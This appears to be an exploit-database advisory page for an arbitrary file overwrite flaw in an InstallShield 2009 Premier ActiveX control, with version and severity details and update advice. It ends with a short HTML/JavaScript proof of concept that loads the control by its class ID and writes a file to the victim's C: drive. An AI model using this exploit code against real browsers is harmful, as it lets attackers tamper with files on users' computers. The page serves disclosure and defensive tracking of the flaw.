InstallShield 2009 Premier ActiveX Control Arbitrary File Overwrite Vulnerability

vendor:

InstallShield 2009 Premier

by:

the_Edit0r

7.5

CVSS

HIGH

Arbitrary File Overwrite

264

CWE

Product Name: InstallShield 2009 Premier

Affected Version From: 15.0.0.53

Affected Version To: 15.0.0.53

Patch Exists: Yes

Related CWE: N/A

CPE: a:flexerasoftware:installshield_2009_premier

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

InstallShield 2009 Premier ActiveX Control Arbitrary File Overwrite Vulnerability

InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability. Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control. InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected.

Mitigation:

Update to the latest version of InstallShield 2009 Premier.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43857/info

InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability.

Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control.

InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected. 

# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ <b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/> by : the_Edit0r <b/> <b/> <object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object> <script> try{ var obj = document.InsertCustomAction('Edit0r'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('check C:'); } catch(err){ window.alert('Poc failed'); } </script>